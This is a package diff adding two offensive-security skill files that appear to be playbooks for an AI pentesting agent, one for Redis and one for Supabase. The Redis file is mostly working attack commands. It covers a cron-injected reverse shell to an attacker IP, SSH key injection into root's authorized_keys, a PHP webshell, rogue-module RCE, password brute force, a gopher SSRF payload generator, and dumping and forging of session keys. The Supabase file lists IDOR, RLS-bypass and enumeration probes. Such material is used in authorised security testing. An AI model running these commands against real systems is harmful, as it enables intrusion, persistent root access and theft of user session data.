@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/technologies-redis/SKILL.md

@@ -0,0 +1,236 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: redis
+description: Security testing playbook for Redis covering unauthenticated access, RCE via cron/SSH key injection, SSRF-to-Redis, Lua scripting, and data extraction
+---
+
+# Redis Security Testing
+
+Redis is a high-value target: unauthenticated by default in older versions, and if accessible leads directly to RCE via cron job injection, SSH key writing, or webshell placement. Common finding in internal networks and via SSRF.
+
+---
+
+## Reconnaissance
+
+### Discovery
+
+    # Port scanning
+    nmap -p 6379 <target> -sV --open -sC
+
+    # Default port: 6379
+    # Sentinel: 26379
+    # Cluster: 7000-7005
+
+    # Redis banner
+    nc <target> 6379
+    PING                    # Returns: +PONG → no auth required
+    INFO server             # Returns: full server info
+
+    # nmap redis scripts
+    nmap --script redis-info,redis-brute <target> -p 6379
+
+---
+
+## Unauthenticated Access
+
+    # Basic auth test
+    redis-cli -h <target> -p 6379 PING
+    # PONG = no authentication required
+
+    redis-cli -h <target> INFO server      # Server info
+    redis-cli -h <target> CONFIG GET *     # All configuration
+    redis-cli -h <target> KEYS *           # All keys
+    redis-cli -h <target> DBSIZE           # Number of keys
+
+---
+
+## Data Extraction
+
+    # List all keys
+    redis-cli -h <target> KEYS *
+    redis-cli -h <target> KEYS "user*"
+    redis-cli -h <target> KEYS "session*"
+    redis-cli -h <target> KEYS "token*"
+
+    # Get value by key
+    redis-cli -h <target> GET <key>
+    redis-cli -h <target> TYPE <key>       # string, hash, list, set, zset
+
+    # Hash operations (common for sessions):
+    redis-cli -h <target> HGETALL <key>    # All fields in hash
+    redis-cli -h <target> HKEYS <key>
+
+    # Scan (safer than KEYS * on large dbs)
+    redis-cli -h <target> SCAN 0 COUNT 100
+
+    # Dump all key-value pairs:
+    redis-cli -h <target> --scan | while read key; do
+      echo "KEY: $key"
+      redis-cli -h <target> GET "$key"
+    done
+
+---
+
+## Remote Code Execution via File Write
+
+Redis's CONFIG SET allows changing the directory and filename for RDB/AOF saves — enabling arbitrary file write.
+
+### Method 1: Cron Job Injection (Linux)
+
+    redis-cli -h <target>
+    CONFIG SET dir /var/spool/cron/crontabs/
+    CONFIG SET dbfilename root
+    SET payload "\n\n* * * * * bash -i >& /dev/tcp/<attacker_ip>/4444 0>&1\n\n"
+    BGSAVE
+
+    # Wait ~1 minute for cron to execute
+    nc -lvnp 4444
+
+### Method 2: SSH Key Injection
+
+    # Generate SSH key pair on attacker:
+    ssh-keygen -t rsa -f /tmp/redis_rsa -N ""
+
+    redis-cli -h <target>
+    CONFIG SET dir /root/.ssh/
+    CONFIG SET dbfilename authorized_keys
+    SET pubkey "\n\n<contents of /tmp/redis_rsa.pub>\n\n"
+    BGSAVE
+
+    # Connect:
+    ssh -i /tmp/redis_rsa root@<target>
+
+### Method 3: Webshell (if web root is known)
+
+    redis-cli -h <target>
+    CONFIG SET dir /var/www/html/
+    CONFIG SET dbfilename shell.php
+    SET payload "<?php system($_GET['cmd']); ?>"
+    BGSAVE
+
+    # Access:
+    curl "http://<target>/shell.php?cmd=id"
+
+---
+
+## RCE via Redis Module Loading (Redis 4.x+)
+
+    # Load a malicious shared library:
+    redis-cli -h <target> MODULE LOAD /path/to/malicious.so
+    redis-cli -h <target> SYSTEM.EXEC "id"
+
+    # Compile malicious module (RedisModuleSDK):
+    # Tools: https://github.com/n0b0dyCN/RedisModulesSDK
+    # redis-rogue-server: automated exploitation
+    git clone https://github.com/n0b0dyCN/redis-rogue-server
+    python3 redis-rogue-server.py --rhost <target> --lhost <attacker>
+
+---
+
+## RCE via Lua Scripting
+
+    # Lua script execution (restricted but test for bypass):
+    redis-cli -h <target> EVAL "return redis.call('info')" 0
+
+    # OS command execution via Lua (Redis < 3.2.0):
+    redis-cli -h <target> EVAL "return redis.call('config', 'set', 'dir', '/tmp')" 0
+
+---
+
+## Authentication Bypass / Brute Force
+
+    # Test with blank auth:
+    redis-cli -h <target> AUTH ""
+
+    # Common Redis passwords:
+    redis-cli -h <target> AUTH redis
+    redis-cli -h <target> AUTH password
+    redis-cli -h <target> AUTH 123456
+    redis-cli -h <target> AUTH admin
+
+    # Brute force with hydra:
+    hydra -P /usr/share/wordlists/rockyou.txt redis://<target>
+
+    # nmap brute:
+    nmap --script redis-brute <target> -p 6379
+
+---
+
+## SSRF to Redis (Gopher Protocol)
+
+If SSRF allows gopher:// protocol, you can send Redis commands through HTTP SSRF:
+
+    # Gopher URL format for Redis commands:
+    gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A
+
+    # Generate gopher payload for Redis RCE:
+    python3 -c "
+    import urllib.parse
+
+    def encode_redis_cmd(*args):
+        cmd = f'*{len(args)}\r\n'
+        for arg in args:
+            cmd += f'\${len(arg)}\r\n{arg}\r\n'
+        return cmd
+
+    # Commands to set SSH key:
+    cmds = [
+        encode_redis_cmd('CONFIG', 'SET', 'dir', '/root/.ssh'),
+        encode_redis_cmd('CONFIG', 'SET', 'dbfilename', 'authorized_keys'),
+        encode_redis_cmd('SET', 'key', '\n\nssh-rsa AAAA... attacker@host\n\n'),
+        encode_redis_cmd('BGSAVE'),
+    ]
+
+    payload = ''.join(cmds)
+    gopher_url = 'gopher://127.0.0.1:6379/_' + urllib.parse.quote(payload)
+    print(gopher_url)
+    "
+
+---
+
+## Redis Cluster Enumeration
+
+    # Get cluster nodes
+    redis-cli -h <target> CLUSTER NODES
+    redis-cli -h <target> CLUSTER INFO
+
+    # Check for replication (master/slave):
+    redis-cli -h <target> INFO replication
+    # slaveof = address of master node
+
+---
+
+## Session Data Extraction
+
+    # Many web apps store sessions in Redis
+    # PHP sessions (laravel, symfony):
+    redis-cli -h <target> KEYS "laravel:*"
+    redis-cli -h <target> KEYS "PHPREDIS_SESSION:*"
+
+    # Node.js express sessions (connect-redis):
+    redis-cli -h <target> KEYS "sess:*"
+    redis-cli -h <target> GET "sess:<session_id>"
+
+    # Python Flask sessions:
+    redis-cli -h <target> KEYS "session:*"
+
+    # If session data found, decode and forge:
+    # JSON sessions → modify role, user_id, etc.
+    # Signed sessions → need secret key
+
+---
+
+## Pro Tips
+
+1. Redis without auth = immediate RCE via cron injection in most Linux environments
+2. SSH key injection is more reliable than cron (instant, doesn't need cron daemon)
+3. Always check `CONFIG GET dir` and `CONFIG GET dbfilename` to understand current save path
+4. Redis exposed via SSRF with gopher:// is an instant RCE chain to internal systems
+5. `KEYS *` on production Redis can be slow and disruptive — use `SCAN` instead
+6. Session keys starting with `sess:` or `laravel:` contain serialized auth data — goldmine
+7. Redis Sentinel on port 26379 often has weaker security than main Redis instance
+
+## Summary
+
+Redis testing = PING for no-auth check + KEYS * for data extraction + cron/SSH RCE via CONFIG SET. Unauthenticated Redis = guaranteed RCE in most Linux environments via SSH key injection or cron job. Sessions stored in Redis are extractable and often forgeable. SSRF-to-Redis via gopher:// is a classic internal escalation chain.

package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md

@@ -0,0 +1,270 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: supabase
+description: Supabase security testing covering Row Level Security, PostgREST, Edge Functions, and service key exposure
+---
+
+# Supabase
+
+Security testing for Supabase applications. Focus on mis-scoped Row Level Security (RLS), unsafe RPCs, leaked `service_role` keys, lax Storage policies, and Edge Functions trusting headers without binding to issuer/audience/tenant.
+
+## Attack Surface
+
+**Data Access**
+- PostgREST: table CRUD, filters, embeddings, RPC (remote functions)
+- GraphQL: pg_graphql over Postgres schema with RLS interaction
+- Realtime: replication subscriptions, broadcast/presence channels
+
+**Storage**
+- Buckets, objects, signed URLs, public/private policies
+
+**Authentication**
+- Auth (GoTrue): JWTs, cookie/session, magic links, OAuth flows
+
+**Server-Side**
+- Edge Functions (Deno): server-side code calling Supabase with secrets
+
+## Architecture
+
+**Endpoints**
+- REST: `https://<ref>.supabase.co/rest/v1/<table>`
+- RPC: `https://<ref>.supabase.co/rest/v1/rpc/<fn>`
+- Storage: `https://<ref>.supabase.co/storage/v1`
+- GraphQL: `https://<ref>.supabase.co/graphql/v1`
+- Realtime: `wss://<ref>.supabase.co/realtime/v1`
+- Auth: `https://<ref>.supabase.co/auth/v1`
+- Functions: `https://<ref>.functions.supabase.co/`
+
+**Headers**
+- `apikey: <anon-or-service>` — identifies project
+- `Authorization: Bearer <JWT>` — binds user context
+
+**Roles**
+- `anon`, `authenticated` — standard roles
+- `service_role` — bypasses RLS, must never be client-exposed
+
+**Key Principle**
+`auth.uid()` returns current user UUID from JWT. Policies must never trust client-supplied IDs over server context.
+
+## High-Value Targets
+
+- Tables with sensitive data (users, orders, payments, PII)
+- RPC functions (especially `SECURITY DEFINER`)
+- Storage buckets with private files
+- Edge Functions with `service_role` access
+- Export/report endpoints generating signed outputs
+- Admin/staff routes and privilege-granting endpoints
+
+## Reconnaissance
+
+**Enumerate Surfaces**
+```
+/rest/v1/<table>
+/rest/v1/rpc/<fn>
+/storage/v1/object/public/<bucket>/
+/storage/v1/object/list/<bucket>?prefix=
+/graphql/v1
+/auth/v1
+```
+
+**Obtain Principals**
+- Unauthenticated (anon key only)
+- Basic user A, user B
+- Admin/staff (if available)
+- Check if `service_role` key leaked in client bundle or Edge Function responses
+
+## Key Vulnerabilities
+
+### Row Level Security (RLS)
+
+Enable RLS on every non-public table; absence or "permit-all" policies → bulk exposure.
+
+**Common Gaps**
+- Policies check `auth.uid()` for SELECT but forget UPDATE/DELETE/INSERT
+- Missing tenant constraints (`org_id`/`tenant_id`) allow cross-tenant access
+- Policies rely on client-provided columns (`user_id` in payload) instead of JWT
+- Complex joins where policy is applied after filters, enabling inference via counts
+
+**Tests**
+```bash
+# Compare row counts for two users
+GET /rest/v1/<table>?select=*&Prefer=count=exact
+
+# Cross-tenant probe
+GET /rest/v1/<table>?org_id=eq.<other_org>
+GET /rest/v1/<table>?or=(org_id.eq.other,org_id.is.null)
+
+# Write-path
+PATCH /rest/v1/<table>?id=eq.<foreign_id>
+DELETE /rest/v1/<table>?id=eq.<foreign_id>
+POST /rest/v1/<table> with foreign owner_id
+```
+
+### PostgREST & REST
+
+**Filters**
+- `eq`, `neq`, `lt`, `gt`, `ilike`, `or`, `is`, `in`
+- Embed relations: `select=*,profile(*)`—exploits overfetch if resolvers skip per-row checks
+- Search leaks: generous `LIKE`/`ILIKE` filters combined with missing RLS → mass disclosure via wildcard queries
+
+**Headers**
+- `Prefer: return=representation` — echo writes
+- `Prefer: count=exact` — exposure via counts
+- `Accept-Profile`/`Content-Profile` — select schema
+
+**IDOR Patterns**
+```
+/rest/v1/<table>?select=*&id=eq.<other_id>
+/rest/v1/<table>?select=*&slug=eq.<other_slug>
+/rest/v1/<table>?select=*&email=eq.<other_email>
+```
+
+**Mass Assignment**
+- If RPC not used, PATCH can update unintended columns
+- Verify restricted columns via database permissions/policies
+
+### RPC Functions
+
+RPC endpoints map to SQL functions. `SECURITY DEFINER` bypasses RLS unless carefully coded; `SECURITY INVOKER` respects caller.
+
+**Anti-Patterns**
+- `SECURITY DEFINER` + missing owner checks → vertical/horizontal bypass
+- `set search_path` left to public; function resolves unsafe objects
+- Trusting client-supplied `user_id`/`tenant_id` rather than `auth.uid()`
+
+**Tests**
+```bash
+# Call as different users with foreign IDs
+POST /rest/v1/rpc/<fn> {"user_id": "<foreign_id>"}
+
+# Remove JWT entirely
+Authorization: Bearer <anon_token>
+```
+Verify functions perform explicit ownership/tenant checks inside SQL.
+
+### Storage
+
+**Buckets**
+- Public vs private; objects in `storage.objects` with RLS-like policies
+
+**Misconfigurations**
+```bash
+# Public bucket with sensitive data
+GET /storage/v1/object/public/<bucket>/<path>
+
+# List prefixes without auth
+GET /storage/v1/object/list/<bucket>?prefix=
+
+# Signed URL reuse across tenants/paths
+```
+
+**Content-Type Abuse**
+- Upload HTML/SVG served as `text/html` or `image/svg+xml`
+- Verify `X-Content-Type-Options: nosniff` and `Content-Disposition: attachment`
+
+**Path Confusion**
+- Mixed case, URL-encoding, `..` segments may be rejected at UI but accepted by API
+- Test path normalization differences between client validation and server handling
+
+### Realtime
+
+**Endpoint**: `wss://<ref>.supabase.co/realtime/v1`
+
+**Risks**
+- Channel names derived from table/schema/filters leaking other users' updates when RLS or channel guards are weak
+- Broadcast/presence channels allowing cross-room join/publish without auth
+
+**Tests**
+- Subscribe to `public:realtime` changes on protected tables; confirm visibility aligns with RLS
+- Attempt joining other users' channels: `room:<user_id>`, `org:<org_id>`
+
+### GraphQL
+
+**Endpoint**: `/graphql/v1` using pg_graphql with RLS
+
+**Risks**
+- Introspection reveals schema relations
+- Overfetch via nested relations where resolvers skip per-row ownership checks
+- Global node IDs leaked and reusable via different viewers
+
+**Tests**
+- Compare REST vs GraphQL responses for same principal and query shape
+- Query deep nested fields; verify RLS holds at each edge
+
+### Auth & Tokens
+
+GoTrue issues JWTs with claims (`sub=uid`, `role`, `aud=authenticated`).
+
+**Verification Requirements**
+- Issuer, audience, expiration, signature, tenant context
+
+**Pitfalls**
+- Storing tokens in localStorage → XSS exfiltration
+- Treating `apikey` as identity (it's project-scoped, not user identity)
+- Exposing `service_role` key in client bundle or Edge Function responses
+- Refresh token mismanagement leading to long-lived sessions beyond intended TTL
+
+**Tests**
+- Replay tokens across services; check audience/issuer pinning
+- Try downgraded tokens (expired/other audience) against custom endpoints
+
+### Edge Functions
+
+Deno-based functions often initialize Supabase client with `service_role`.
+
+**Risks**
+- Trusting Authorization/apikey headers without verifying JWT against issuer/audience
+- CORS: wildcard origins with credentials; reflected Authorization in responses
+- SSRF via fetch; secrets exposed via error traces or logs
+
+**Tests**
+- Call functions with and without Authorization; compare behavior
+- Try foreign resource IDs in payloads; verify server re-derives user/tenant from JWT
+- Attempt to reach internal endpoints (metadata services) via function fetch
+
+### Tenant Isolation
+
+Ensure every query joins or filters by `tenant_id`/`org_id` derived from JWT context, not client input.
+
+**Tests**
+- Change subdomain/header/path tenant selectors while keeping JWT tenant constant
+- Export/report endpoints: confirm queries execute under caller scope
+
+## Bypass Techniques
+
+- Content-type switching: `application/json` ↔ `application/x-www-form-urlencoded` ↔ `multipart/form-data`
+- Parameter pollution: duplicate keys in JSON/query (PostgREST chooses last/first depending on parser)
+- GraphQL+REST parity probing: protections often drift; fetch via the weaker path
+- Race windows: parallel writes to bypass post-insert ownership updates
+
+## Blind Enumeration
+
+- Use `Prefer: count=exact` and ETag/length diffs to infer unauthorized rows
+- Conditional requests (`If-None-Match`) to detect object existence
+- Storage signed URLs: timing/length deltas to map valid vs invalid tokens
+
+## Testing Methodology
+
+1. **Inventory surfaces** - Map REST, Storage, GraphQL, Realtime, Auth, Functions endpoints
+2. **Obtain principals** - Collect tokens for anon, user A/B, admin; check for `service_role` leaks
+3. **Build matrix** - Resource × Action × Principal
+4. **REST vs GraphQL** - Test both to find parity gaps
+5. **Seed IDs** - Start with list/search endpoints to gather IDs
+6. **Cross-principal** - Swap IDs, tenants, and transports across principals
+
+## Tooling
+
+- PostgREST: httpie/curl + jq; enumerate tables; fuzz filters (`or=`, `ilike`, `neq`, `is.null`)
+- GraphQL: graphql-inspector, voyager; deep queries for field-level enforcement
+- Realtime: custom ws client; subscribe to suspicious channels; diff payloads per principal
+- Storage: enumerate bucket listing APIs; script signed URL patterns
+- Auth/JWT: jwt-cli/jose to validate audience/issuer; replay against Edge Functions
+- Policy diffing: maintain request sets per role; compare results across releases
+
+## Validation Requirements
+
+- Owner vs non-owner requests for REST/GraphQL showing unauthorized access (content or metadata)
+- Mis-scoped RPC or Storage signed URL usable by another user/tenant
+- Realtime or GraphQL exposure matching missing policy checks
+- Minimal reproducible requests with role contexts documented